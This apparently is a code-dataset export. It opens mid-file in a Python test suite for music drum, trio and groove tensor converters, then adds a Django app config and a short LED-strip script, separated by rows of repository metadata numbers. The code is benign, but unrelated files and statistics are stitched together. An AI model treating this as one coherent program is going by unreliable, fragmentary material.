input_ = np.zeros((len(label_arr), converter.input_depth),
converter.input_dtype)
for i, l in enumerate(label_arr):
if l == converter.end_token:
input_[i, -2] = 1
elif l == 0:
input_[i, -1] = 1
else:
j = 0
while l:
input_[i, j] = l % 2
l >>= 1
j += 1
assert np.any(input_[i]), label_arr.astype(np.int)
inputs.append(input_)
return inputs
def setUp(self):
super(RollInputsOneHotDrumsConverterTest, self).setUp()
self.converter_class = functools.partial(
data.DrumsConverter, roll_input=True)
class RollOutputsDrumsConverterTest(BaseDataTest, tf.test.TestCase):
def setUp(self):
sequence = music_pb2.NoteSequence()
sequence.tempos.add(qpm=60)
testing_lib.add_track_to_sequence(
sequence, 0,
[(35, 100, 0, 10), (35, 55, 1, 2), (44, 55, 1, 2),
(40, 45, 4, 5),
(35, 45, 9, 10),
(40, 45, 13, 13),
(55, 120, 16, 18), (60, 100, 16, 17), (53, 99, 19, 20),
(40, 45, 33, 34), (55, 120, 36, 37), (60, 100, 36, 37),
(53, 99, 39, 42)],
is_drum=True)
testing_lib.add_track_to_sequence(
sequence, 1,
[(35, 100, 5, 10), (35, 55, 6, 8), (44, 55, 7, 9)],
is_drum=False)
self.sequence = sequence
def testSliced(self):
expected_sliced_events = [
([0], [0, 2], [], [],
[1], [], [], []),
([], [0], [], [],
[], [1], [], []),
([], [1], [], [],
[5, 7], [], [], [8]),
]
expected_silent_array = np.array([
[0, 0, 1, 1, 0, 1, 1, 1],
[1, 0, 1, 1, 1, 0, 1, 1],
[1, 0, 1, 1, 0, 1, 1, 0],
])
expected_output_tensors = np.zeros(
(len(expected_sliced_events), 8, len(data.REDUCED_DRUM_PITCH_CLASSES)),
np.bool)
for i, events in enumerate(expected_sliced_events):
for j, e in enumerate(events):
expected_output_tensors[i, j, e] = 1
converter = data.DrumsConverter(
pitch_classes=data.REDUCED_DRUM_PITCH_CLASSES,
slice_bars=2,
steps_per_quarter=1,
roll_input=True,
roll_output=True,
max_tensors_per_notesequence=None)
self.assertEqual(10, converter.input_depth)
self.assertEqual(9, converter.output_depth)
tensors = converter.to_tensors(self.sequence)
self.assertArraySetsEqual(
np.append(
expected_output_tensors,
np.expand_dims(expected_silent_array, axis=2),
axis=2),
tensors.inputs)
self.assertArraySetsEqual(expected_output_tensors, tensors.outputs)
def testToNoteSequence(self):
converter = data.DrumsConverter(
pitch_classes=data.REDUCED_DRUM_PITCH_CLASSES,
slice_bars=None,
gap_bars=None,
steps_per_quarter=1,
roll_input=True,
roll_output=True,
max_tensors_per_notesequence=None)
tensors = converter.to_tensors(self.sequence)
sequences = converter.to_notesequences(tensors.outputs)
self.assertEqual(1, len(sequences))
expected_sequence = music_pb2.NoteSequence(ticks_per_quarter=220)
expected_sequence.tempos.add(qpm=120)
testing_lib.add_track_to_sequence(
expected_sequence, 0,
[(36, 80, 0, 0.5), (42, 80, 0.5, 1.0), (36, 80, 0.5, 1.0),
(38, 80, 2.0, 2.5),
(36, 80, 4.5, 5.0),
(38, 80, 6.5, 7.0),
(48, 80, 8.0, 8.5), (49, 80, 8.0, 8.5), (51, 80, 9.5, 10.0),
(38, 80, 16.5, 17.0), (48, 80, 18.0, 18.5), (49, 80, 18.0, 18.5),
(51, 80, 19.5, 20.0)],
is_drum=True)
for n in expected_sequence.notes:
n.instrument = 9
self.assertProtoEquals(expected_sequence, sequences[0])
class TrioConverterTest(BaseDataTest, tf.test.TestCase):
def setUp(self):
sequence = music_pb2.NoteSequence()
sequence.tempos.add(qpm=60)
# Mel 1, coverage bars: [3, 9] / [2, 9]
testing_lib.add_track_to_sequence(
sequence, 1, [(51, 1, 13, 37)])
# Mel 2, coverage bars: [1, 3] / [0, 4]
testing_lib.add_track_to_sequence(
sequence, 2, [(52, 1, 4, 16)])
# Bass, coverage bars: [0, 1], [4, 6] / [0, 7]
testing_lib.add_track_to_sequence(
sequence, 3, [(50, 1, 2, 5), (49, 1, 16, 25)])
# Drum, coverage bars: [0, 2], [6, 7] / [0, 3], [5, 8]
testing_lib.add_track_to_sequence(
sequence, 4,
[(35, 1, 0, 1), (40, 1, 4, 5),
(35, 1, 9, 9), (35, 1, 25, 25),
(40, 1, 29, 29)],
is_drum=True)
# Chords.
testing_lib.add_chords_to_sequence(
sequence, [('C', 4), ('Am', 16), ('G', 32)])
for n in sequence.notes:
if n.instrument == 1:
n.program = 0
elif n.instrument == 2:
n.program = 10
elif n.instrument == 3:
n.program = 33
self.sequence = sequence
m1 = np.array(
[NO_EVENT] * 13 + [30] + [NO_EVENT] * 23 + [NOTE_OFF] + [NO_EVENT] * 2,
np.int32) + 2
m2 = np.array(
[NO_EVENT] * 4 + [31] + [NO_EVENT] * 11 + [NOTE_OFF] + [NO_EVENT] * 23,
np.int32) + 2
b = np.array(
[NO_EVENT, NO_EVENT, 29, NO_EVENT, NO_EVENT, NOTE_OFF] +
[NO_EVENT] * 10 + [28] + [NO_EVENT] * 8 + [NOTE_OFF] + [NO_EVENT] * 14,
np.int32) + 2
d = ([1, NO_DRUMS, NO_DRUMS, NO_DRUMS,
2, NO_DRUMS, NO_DRUMS, NO_DRUMS,
NO_DRUMS, 1, NO_DRUMS, NO_DRUMS] +
[NO_DRUMS] * 12 +
[NO_DRUMS, 1, NO_DRUMS, NO_DRUMS,
NO_DRUMS, 2, NO_DRUMS, NO_DRUMS] +
[NO_DRUMS] * 4)
c = [NO_CHORD, NO_CHORD, NO_CHORD, NO_CHORD,
'C', 'C', 'C', 'C',
'C', 'C', 'C', 'C',
'C', 'C', 'C', 'C',
'Am', 'Am', 'Am', 'Am',
'Am', 'Am', 'Am', 'Am',
'Am', 'Am', 'Am', 'Am',
'Am', 'Am', 'Am', 'Am',
'G', 'G', 'G', 'G']
expected_sliced_sets = [
((2, 4), (m1, b, d)),
((5, 7), (m1, b, d)),
((6, 8), (m1, b, d)),
((0, 2), (m2, b, d)),
((1, 3), (m2, b, d)),
((2, 4), (m2, b, d)),
]
self.expected_sliced_labels = [
np.stack([l[i*4:j*4] for l in x]) for (i, j), x in expected_sliced_sets]
chord_encoding = mm.MajorMinorChordOneHotEncoding()
expected_sliced_chord_events = [
c[i*4:j*4] for (i, j), _ in expected_sliced_sets]
self.expected_sliced_chord_labels = [
np.array([chord_encoding.encode_event(e) for e in es])
for es in expected_sliced_chord_events]
def testSliced(self):
converter = data.TrioConverter(
steps_per_quarter=1, gap_bars=1, slice_bars=2,
max_tensors_per_notesequence=None)
tensors = converter.to_tensors(self.sequence)
self.assertArraySetsEqual(tensors.inputs, tensors.outputs)
actual_sliced_labels = [
np.stack(np.argmax(s, axis=-1) for s in np.split(t, [90, 180], axis=-1))
for t in tensors.outputs]
self.assertArraySetsEqual(self.expected_sliced_labels, actual_sliced_labels)
def testSlicedChordConditioned(self):
converter = data.TrioConverter(
steps_per_quarter=1, gap_bars=1, slice_bars=2,
max_tensors_per_notesequence=None,
chord_encoding=mm.MajorMinorChordOneHotEncoding())
tensors = converter.to_tensors(self.sequence)
self.assertArraySetsEqual(tensors.inputs, tensors.outputs)
actual_sliced_labels = [
np.stack(np.argmax(s, axis=-1) for s in np.split(t, [90, 180], axis=-1))
for t in tensors.outputs]
actual_sliced_chord_labels = [
np.argmax(t, axis=-1) for t in tensors.controls]
self.assertArraySetsEqual(self.expected_sliced_labels, actual_sliced_labels)
self.assertArraySetsEqual(
self.expected_sliced_chord_labels, actual_sliced_chord_labels)
def testToNoteSequence(self):
converter = data.TrioConverter(
steps_per_quarter=1, slice_bars=2, max_tensors_per_notesequence=1)
mel_oh = data.np_onehot(self.expected_sliced_labels[3][0], 90)
bass_oh = data.np_onehot(self.expected_sliced_labels[3][1], 90)
drums_oh = data.np_onehot(self.expected_sliced_labels[3][2], 512)
output_tensors = np.concatenate([mel_oh, bass_oh, drums_oh], axis=-1)
sequences = converter.to_notesequences([output_tensors])
self.assertEqual(1, len(sequences))
self.assertProtoEquals(
"""
ticks_per_quarter: 220
tempos < qpm: 120 >
notes <
instrument: 0 pitch: 52 start_time: 2.0 end_time: 4.0 program: 0
velocity: 80
>
notes <
instrument: 1 pitch: 50 start_time: 1.0 end_time: 2.5 program: 33
velocity: 80
>
notes <
instrument: 9 pitch: 36 start_time: 0.0 end_time: 0.5 velocity: 80
is_drum: True
>
notes <
instrument: 9 pitch: 38 start_time: 2.0 end_time: 2.5 velocity: 80
is_drum: True
>
total_time: 4.0
""",
sequences[0])
def testToNoteSequenceChordConditioned(self):
converter = data.TrioConverter(
steps_per_quarter=1, slice_bars=2, max_tensors_per_notesequence=1,
chord_encoding=mm.MajorMinorChordOneHotEncoding())
mel_oh = data.np_onehot(self.expected_sliced_labels[3][0], 90)
bass_oh = data.np_onehot(self.expected_sliced_labels[3][1], 90)
drums_oh = data.np_onehot(self.expected_sliced_labels[3][2], 512)
chords_oh = data.np_onehot(self.expected_sliced_chord_labels[3], 25)
output_tensors = np.concatenate([mel_oh, bass_oh, drums_oh], axis=-1)
sequences = converter.to_notesequences([output_tensors], [chords_oh])
self.assertEqual(1, len(sequences))
self.assertProtoEquals(
"""
ticks_per_quarter: 220
tempos < qpm: 120 >
notes <
instrument: 0 pitch: 52 start_time: 2.0 end_time: 4.0 program: 0
velocity: 80
>
notes <
instrument: 1 pitch: 50 start_time: 1.0 end_time: 2.5 program: 33
velocity: 80
>
notes <
instrument: 9 pitch: 36 start_time: 0.0 end_time: 0.5 velocity: 80
is_drum: True
>
notes <
instrument: 9 pitch: 38 start_time: 2.0 end_time: 2.5 velocity: 80
is_drum: True
>
text_annotations <
text: 'N.C.' annotation_type: CHORD_SYMBOL
>
text_annotations <
time: 2.0 text: 'C' annotation_type: CHORD_SYMBOL
>
total_time: 4.0
""",
sequences[0])
class GrooveConverterTest(tf.test.TestCase):
def initialize_sequence(self):
sequence = music_pb2.NoteSequence()
sequence.ticks_per_quarter = 240
sequence.tempos.add(qpm=120)
sequence.time_signatures.add(numerator=4, denominator=4)
return sequence
def setUp(self):
self.one_bar_sequence = self.initialize_sequence()
self.two_bar_sequence = self.initialize_sequence()
self.tap_sequence = self.initialize_sequence()
self.quantized_sequence = self.initialize_sequence()
self.no_closed_hh_sequence = self.initialize_sequence()
self.no_snare_sequence = self.initialize_sequence()
kick_pitch = data.REDUCED_DRUM_PITCH_CLASSES[0][0]
snare_pitch = data.REDUCED_DRUM_PITCH_CLASSES[1][0]
closed_hh_pitch = data.REDUCED_DRUM_PITCH_CLASSES[2][0]
tap_pitch = data.REDUCED_DRUM_PITCH_CLASSES[3][0]
testing_lib.add_track_to_sequence(
self.tap_sequence,
9,
[
# 0.125 is a sixteenth note at 120bpm
(tap_pitch, 80, 0, 0.125),
(tap_pitch, 127, 0.26125, 0.375), # Not on the beat
(tap_pitch, 107, 0.5, 0.625),
(tap_pitch, 80, 0.75, 0.825),
(tap_pitch, 80, 1, 1.125),
(tap_pitch, 80, 1.25, 1.375),
(tap_pitch, 82, 1.523, 1.625), # Not on the beat
(tap_pitch, 80, 1.75, 1.825)
])
testing_lib.add_track_to_sequence(
self.quantized_sequence,
9,
[
# 0.125 is a sixteenth note at 120bpm
(kick_pitch, 0, 0, 0.125),
(closed_hh_pitch, 0, 0, 0.125),
(closed_hh_pitch, 0, 0.25, 0.375),
(snare_pitch, 0, 0.5, 0.625),
(closed_hh_pitch, 0, 0.5, 0.625),
(closed_hh_pitch, 0, 0.75, 0.825),
(kick_pitch, 0, 1, 1.125),
(closed_hh_pitch, 0, 1, 1.125),
(closed_hh_pitch, 0, 1.25, 1.375),
(snare_pitch, 0, 1.5, 1.625),
(closed_hh_pitch, 0, 1.5, 1.625),
(closed_hh_pitch, 0, 1.75, 1.825)
])
testing_lib.add_track_to_sequence(
self.no_closed_hh_sequence,
9,
[
# 0.125 is a sixteenth note at 120bpm
(kick_pitch, 80, 0, 0.125),
(snare_pitch, 103, 0.5, 0.625),
(kick_pitch, 80, 1, 1.125),
(snare_pitch, 82, 1.523, 1.625), # Not on the beat
])
testing_lib.add_track_to_sequence(
self.no_snare_sequence,
9,
[
# 0.125 is a sixteenth note at 120bpm
(kick_pitch, 80, 0, 0.125),
(closed_hh_pitch, 72, 0, 0.125),
(closed_hh_pitch, 127, 0.26125, 0.375), # Not on the beat
(closed_hh_pitch, 107, 0.5, 0.625),
(closed_hh_pitch, 80, 0.75, 0.825),
(kick_pitch, 80, 1, 1.125),
(closed_hh_pitch, 80, 1, 1.125),
(closed_hh_pitch, 80, 1.25, 1.375),
(closed_hh_pitch, 80, 1.5, 1.625),
(closed_hh_pitch, 80, 1.75, 1.825)
])
testing_lib.add_track_to_sequence(
self.one_bar_sequence,
9,
[
# 0.125 is a sixteenth note at 120bpm
(kick_pitch, 80, 0, 0.125),
(closed_hh_pitch, 72, 0, 0.125),
(closed_hh_pitch, 127, 0.26125, 0.375), # Not on the beat
(snare_pitch, 103, 0.5, 0.625),
(closed_hh_pitch, 107, 0.5, 0.625),
(closed_hh_pitch, 80, 0.75, 0.825),
(kick_pitch, 80, 1, 1.125),
(closed_hh_pitch, 80, 1, 1.125),
(closed_hh_pitch, 80, 1.25, 1.375),
(snare_pitch, 82, 1.523, 1.625), # Not on the beat
(closed_hh_pitch, 80, 1.5, 1.625),
(closed_hh_pitch, 80, 1.75, 1.825)
])
testing_lib.add_track_to_sequence(
self.two_bar_sequence,
9,
[
# 0.125 is a sixteenth note at 120bpm
(kick_pitch, 80, 0, 0.125),
(closed_hh_pitch, 72, 0, 0.125),
(closed_hh_pitch, 127, 0.26, 0.375), # Not on the beat
(snare_pitch, 103, 0.5, 0.625),
(closed_hh_pitch, 107, 0.5, 0.625),
(closed_hh_pitch, 80, 0.75, 0.825),
(kick_pitch, 80, 1, 1.125),
(closed_hh_pitch, 80, 1, 1.125),
(closed_hh_pitch, 80, 1.25, 1.375),
(snare_pitch, 80, 1.5, 1.625),
(closed_hh_pitch, 80, 1.5, 1.625),
(closed_hh_pitch, 80, 1.75, 1.825),
(kick_pitch, 80, 2, 2.125),
(closed_hh_pitch, 72, 2, 2.125),
(closed_hh_pitch, 127, 2.25, 2.375),
(snare_pitch, 103, 2.5, 2.625),
(closed_hh_pitch, 107, 2.5, 2.625),
(closed_hh_pitch, 80, 2.75, 2.825),
(kick_pitch, 80, 3.06, 3.125), # Not on the beat
(closed_hh_pitch, 109, 3, 3.125),
(closed_hh_pitch, 80, 3.25, 3.375),
(snare_pitch, 80, 3.5, 3.625),
(closed_hh_pitch, 80, 3.50, 3.625),
(closed_hh_pitch, 90, 3.75, 3.825)
])
for seq in [self.one_bar_sequence, self.two_bar_sequence]:
for n in seq.notes:
n.is_drum = True
def compare_seqs(self, seq1, seq2, verbose=False, categorical=False):
self.compare_notes(seq1.notes, seq2.notes, verbose=verbose,
categorical=categorical)
def compare_notes(self, note_list1, note_list2, verbose=False,
categorical=False):
for n1, n2 in zip(note_list1, note_list2):
if verbose:
tf.logging.info((n1.pitch, n1.start_time, n1.velocity))
tf.logging.info((n2.pitch, n2.start_time, n2.velocity))
print()
else:
if categorical:
self.assertEqual(n1.pitch, n2.pitch)
assert np.abs(n1.start_time-n2.start_time) < 0.005
assert np.abs(n1.velocity-n2.velocity) <= 4
else:
self.assertEqual((n1.pitch, n1.start_time, n1.velocity),
(n2.pitch, n2.start_time, n2.velocity))
def testToTensorAndNoteSequence(self):
# Convert one or two measures to a tensor and back
# This example should yield basically a perfect reconstruction
converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5)
# Test one bar sequence
tensors = converter.to_tensors(self.one_bar_sequence)
# Should output a tuple containing a tensor of shape (16,27)
self.assertEqual((16, 27), tensors.outputs[0].shape)
sequences = converter.to_items(tensors.outputs)
self.assertEqual(1, len(sequences))
self.compare_seqs(self.one_bar_sequence, sequences[0])
# Test two bar sequence
tensors = converter.to_tensors(self.two_bar_sequence)
# Should output a tuple containing a tensor of shape (32,27)
self.assertEqual((32, 27), tensors.outputs[0].shape)
sequences = converter.to_items(tensors.outputs)
self.assertEqual(1, len(sequences))
self.compare_seqs(self.two_bar_sequence, sequences[0])
def testToTensorAndNoteSequenceWithSlicing(self):
converter = data.GrooveConverter(
split_bars=1, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5)
# Test one bar sequence
tensors = converter.to_tensors(self.one_bar_sequence)
# Should output a tuple containing a tensor of shape (16,27)
self.assertEqual(1, len(tensors.outputs))
self.assertEqual((16, 27), tensors.outputs[0].shape)
sequences = converter.to_items(tensors.outputs)
self.assertEqual(1, len(sequences))
self.compare_seqs(self.one_bar_sequence, sequences[0])
# Test two bar sequence
tensors = converter.to_tensors(self.two_bar_sequence)
# Should output a tuple containing 2 tensors of shape (16,27)
self.assertEqual((16, 27), tensors.outputs[0].shape)
self.assertEqual((16, 27), tensors.outputs[1].shape)
sequences = converter.to_items(tensors.outputs)
self.assertEqual(2, len(sequences))
# Get notes in first bar
sequence0 = sequences[0]
notes0 = [n for n in self.two_bar_sequence.notes if n.start_time < 2]
reconstructed_notes0 = [n for n in sequence0.notes]
# Get notes in second bar, back them up by 2 secs for comparison
sequence1 = sequences[1]
notes1 = [n for n in self.two_bar_sequence.notes if n.start_time >= 2]
for n in notes1:
n.start_time = n.start_time-2
n.end_time = n.end_time-2
reconstructed_notes1 = [n for n in sequence1.notes]
self.compare_notes(notes0, reconstructed_notes0)
self.compare_notes(notes1, reconstructed_notes1)
def testTapify(self):
converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, tapify=True)
tensors = converter.to_tensors(self.one_bar_sequence)
output_sequences = converter.to_items(tensors.outputs)
# Output sequence should match the initial input.
self.compare_seqs(self.one_bar_sequence, output_sequences[0])
# Input sequence should match the pre-defined tap_sequence.
input_sequences = converter.to_items(tensors.inputs)
self.compare_seqs(self.tap_sequence, input_sequences[0])
def testTapWithFixedVelocity(self):
converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, tapify=True, fixed_velocities=True)
tensors = converter.to_tensors(self.one_bar_sequence)
output_sequences = converter.to_items(tensors.outputs)
# Output sequence should match the initial input.
self.compare_seqs(self.one_bar_sequence, output_sequences[0])
# Input sequence should match the pre-defined tap_sequence but with 0 vels.
input_sequences = converter.to_items(tensors.inputs)
tap_notes = self.tap_sequence.notes
for note in tap_notes:
note.velocity = 0
self.compare_notes(tap_notes, input_sequences[0].notes)
def testTapWithNoteDropout(self):
tap_converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, tapify=True, fixed_velocities=True)
dropout_converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, tapify=True, fixed_velocities=True,
max_note_dropout_probability=0.8)
tap_tensors = tap_converter.to_tensors(self.one_bar_sequence)
tap_input_sequences = tap_converter.to_items(tap_tensors.inputs)
dropout_tensors = dropout_converter.to_tensors(self.one_bar_sequence)
dropout_input_sequences = dropout_converter.to_items(dropout_tensors.inputs)
output_sequences = dropout_converter.to_items(dropout_tensors.outputs)
# Output sequence should match the initial input.
self.compare_seqs(self.one_bar_sequence, output_sequences[0])
# Input sequence should have <= the number of notes as regular tap.
self.assertEqual(len(tap_input_sequences[0].notes), max(len(
tap_input_sequences[0].notes), len(dropout_input_sequences[0].notes)))
def testHumanize(self):
converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, humanize=True)
tensors = converter.to_tensors(self.one_bar_sequence)
output_sequences = converter.to_items(tensors.outputs)
# Output sequence should match the initial input.
self.compare_seqs(self.one_bar_sequence, output_sequences[0])
# Input sequence should match the pre-defined quantized_sequence.
input_sequences = converter.to_items(tensors.inputs)
self.compare_seqs(self.quantized_sequence, input_sequences[0])
def testAddInstruments(self):
# Remove closed hi-hat from inputs.
converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, add_instruments=[2])
tensors = converter.to_tensors(self.one_bar_sequence)
output_sequences = converter.to_items(tensors.outputs)
# Output sequence should match the initial input.
self.compare_seqs(self.one_bar_sequence, output_sequences[0])
# Input sequence should match the pre-defined sequence.
input_sequences = converter.to_items(tensors.inputs)
self.compare_seqs(self.no_closed_hh_sequence, input_sequences[0])
# Remove snare from inputs.
converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, add_instruments=[1])
tensors = converter.to_tensors(self.one_bar_sequence)
output_sequences = converter.to_items(tensors.outputs)
# Output sequence should match the initial input.
self.compare_seqs(self.one_bar_sequence, output_sequences[0])
# Input sequence should match the pre-defined sequence.
input_sequences = converter.to_items(tensors.inputs)
self.compare_seqs(self.no_snare_sequence, input_sequences[0])
def testCategorical(self):
# Removes closed hi-hat from inputs.
converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, add_instruments=[3],
num_velocity_bins=32, num_offset_bins=32)
tensors = converter.to_tensors(self.one_bar_sequence)
self.assertEqual((16, 585), tensors.outputs[0].shape)
output_sequences = converter.to_items(tensors.outputs)
self.compare_seqs(self.one_bar_sequence, output_sequences[0],
categorical=True)
def testContinuousSplitInstruments(self):
converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, split_instruments=True)
tensors = converter.to_tensors(self.one_bar_sequence)
self.assertEqual((16 * 9, 3), tensors.outputs[0].shape)
self.assertEqual((16 * 9, 9), tensors.controls[0].shape)
for i, v in enumerate(np.argmax(tensors.controls[0], axis=-1)):
self.assertEqual(i % 9, v)
output_sequences = converter.to_items(tensors.outputs)
self.compare_seqs(self.one_bar_sequence, output_sequences[0],
categorical=True)
def testCategoricalSplitInstruments(self):
converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, num_velocity_bins=32,
num_offset_bins=32, split_instruments=True)
tensors = converter.to_tensors(self.one_bar_sequence)
self.assertEqual((16 * 9, 585 // 9), tensors.outputs[0].shape)
self.assertEqual((16 * 9, 9), tensors.controls[0].shape)
for i, v in enumerate(np.argmax(tensors.controls[0], axis=-1)):
self.assertEqual(i % 9, v)
output_sequences = converter.to_items(tensors.outputs)
self.compare_seqs(self.one_bar_sequence, output_sequences[0],
categorical=True)
def testCycleData(self):
converter = data.GrooveConverter(
split_bars=1, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, hop_size=4)
tensors = converter.to_tensors(self.two_bar_sequence)
outputs = tensors.outputs
for output in outputs:
self.assertEqual(output.shape, (16, 27))
output_sequences = converter.to_items(tensors.outputs)
self.assertEqual(len(output_sequences), 5)
def testCycleDataSplitInstruments(self):
converter = data.GrooveConverter(
split_bars=1, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=10, hop_size=4,
split_instruments=True)
tensors = converter.to_tensors(self.two_bar_sequence)
outputs = tensors.outputs
controls = tensors.controls
output_sequences = converter.to_items(outputs)
self.assertEqual(len(outputs), 5)
self.assertEqual(len(controls), 5)
for output in outputs:
self.assertEqual(output.shape, (16*9, 3))
for control in controls:
self.assertEqual(control.shape, (16*9, 9))
# This compares output_sequences[0] to the first bar of two_bar_sequence
# since they are not actually the same length.
self.compare_seqs(self.two_bar_sequence, output_sequences[0])
self.assertEqual(output_sequences[0].notes[-1].start_time, 1.75)
def testHitsAsControls(self):
converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, hits_as_controls=True)
tensors = converter.to_tensors(self.one_bar_sequence)
self.assertEqual((16, 9), tensors.controls[0].shape)
def testHitsAsControlsSplitInstruments(self):
converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, split_instruments=True,
hits_as_controls=True)
tensors = converter.to_tensors(self.two_bar_sequence)
controls = tensors.controls
self.assertEqual((32*9, 10), controls[0].shape)
def testSmallDrumSet(self):
# Convert one or two measures to a tensor and back
# This example should yield basically a perfect reconstruction
small_drum_set = [
data.REDUCED_DRUM_PITCH_CLASSES[0],
data.REDUCED_DRUM_PITCH_CLASSES[1] +
data.REDUCED_DRUM_PITCH_CLASSES[4] +
data.REDUCED_DRUM_PITCH_CLASSES[5] +
data.REDUCED_DRUM_PITCH_CLASSES[6],
data.REDUCED_DRUM_PITCH_CLASSES[2] + data.REDUCED_DRUM_PITCH_CLASSES[8],
data.REDUCED_DRUM_PITCH_CLASSES[3] + data.REDUCED_DRUM_PITCH_CLASSES[7]
]
converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, pitch_classes=small_drum_set)
# Test one bar sequence
tensors = converter.to_tensors(self.one_bar_sequence)
# Should output a tuple containing a tensor of shape (16, 12)
self.assertEqual((16, 12), tensors.outputs[0].shape)
sequences = converter.to_items(tensors.outputs)
self.assertEqual(1, len(sequences))
self.compare_seqs(self.one_bar_sequence, sequences[0])
def testModeMappings(self):
default_pitches = [
[0, 1],
[2, 3],
]
inference_pitches = [
[1, 2],
[3, 0],
]
converter = data.GrooveConverter(
split_bars=None, steps_per_quarter=4, quarters_per_bar=4,
max_tensors_per_notesequence=5, pitch_classes=default_pitches,
inference_pitch_classes=inference_pitches)
test_seq = self.initialize_sequence()
testing_lib.add_track_to_sequence(
test_seq,
9,
[
(0, 50, 0, 0),
(1, 60, 0.25, 0.25),
(2, 70, 0.5, 0.5),
(3, 80, 0.75, 0.75),
])
# Test in default mode.
default_tensors = converter.to_tensors(test_seq)
default_sequences = converter.to_items(default_tensors.outputs)
expected_default_sequence = music_pb2.NoteSequence()
expected_default_sequence.CopyFrom(test_seq)
expected_default_sequence.notes[1].pitch = 0
expected_default_sequence.notes[3].pitch = 2
self.compare_seqs(expected_default_sequence, default_sequences[0])
# Test in train mode.
converter.set_mode('train')
train_tensors = converter.to_tensors(test_seq)
train_sequences = converter.to_items(train_tensors.outputs)
self.compare_seqs(expected_default_sequence, train_sequences[0])
# Test in inference mode.
converter.set_mode('infer')
infer_tensors = converter.to_tensors(test_seq)
infer_sequences = converter.to_items(infer_tensors.outputs)
expected_infer_sequence = music_pb2.NoteSequence()
expected_infer_sequence.CopyFrom(test_seq)
expected_infer_sequence.notes[0].pitch = 3
expected_infer_sequence.notes[2].pitch = 1
self.compare_seqs(expected_infer_sequence, infer_sequences[0])
if __name__ == '__main__':
tf.test.main()
| 37.712309 | 80 | 0.659746 | 7,022 | 51,779 | 4.616491 | 0.069211 | 0.025789 | 0.024432 | 0.031619 | 0.769812 | 0.727334 | 0.689453 | 0.647346 | 0.632323 | 0.61332 | 0 | 0.057625 | 0.221789 | 51,779 | 1,372 | 81 | 37.739796 | 0.746867 | 0.055042 | 0 | 0.552581 | 0 | 0 | 0.00474 | 0 | 0 | 0 | 0 | 0 | 0.092734 | 1 | 0.053537 | false | 0 | 0.010516 | 0.001912 | 0.078394 | 0.001912 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b94c362fde6f3a5feee6c217600d3bde51de4ef6 | 296 | py | Python | technologies/apps.py | glomium/elmnt.de | 3f901083f6c7e9922ff1b89f2d35d1bb44d2511e | [
"MIT"
] | null | null | null | technologies/apps.py | glomium/elmnt.de | 3f901083f6c7e9922ff1b89f2d35d1bb44d2511e | [
"MIT"
] | null | null | null | technologies/apps.py | glomium/elmnt.de | 3f901083f6c7e9922ff1b89f2d35d1bb44d2511e | [
"MIT"
] | null | null | null | #!/usr/bin/python
# ex:set fileencoding=utf-8:
from __future__ import unicode_literals
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class Config(AppConfig):
name = "technologies"
label = "technologies"
verbose_name = _("Technologies")
| 21.142857 | 55 | 0.756757 | 36 | 296 | 5.972222 | 0.75 | 0.093023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003984 | 0.152027 | 296 | 13 | 56 | 22.769231 | 0.85259 | 0.14527 | 0 | 0 | 0 | 0 | 0.143426 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
b9c298db8a4fb6ee6bb32166278e05447b4ffe05 | 419 | py | Python | Lab3/Lab3 LED strip Code.py | KuangChih/Design-for-IoT-Middleware | 294ea7658be715a81f92303e5a8f3966107050fd | [
"BSD-2-Clause-FreeBSD"
] | 1 | 2016-10-18T13:56:44.000Z | 2016-10-18T13:56:44.000Z | Lab3/Lab3 LED strip Code.py | KuangChih/Design-for-IoT-Middleware | 294ea7658be715a81f92303e5a8f3966107050fd | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | Lab3/Lab3 LED strip Code.py | KuangChih/Design-for-IoT-Middleware | 294ea7658be715a81f92303e5a8f3966107050fd | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | import mraa
import pyupm_lpd8806
import time
nLED = 4
mystrip = pyupm_lpd8806.LPD8806(nLED, 7)
while True:
mystrip.show()
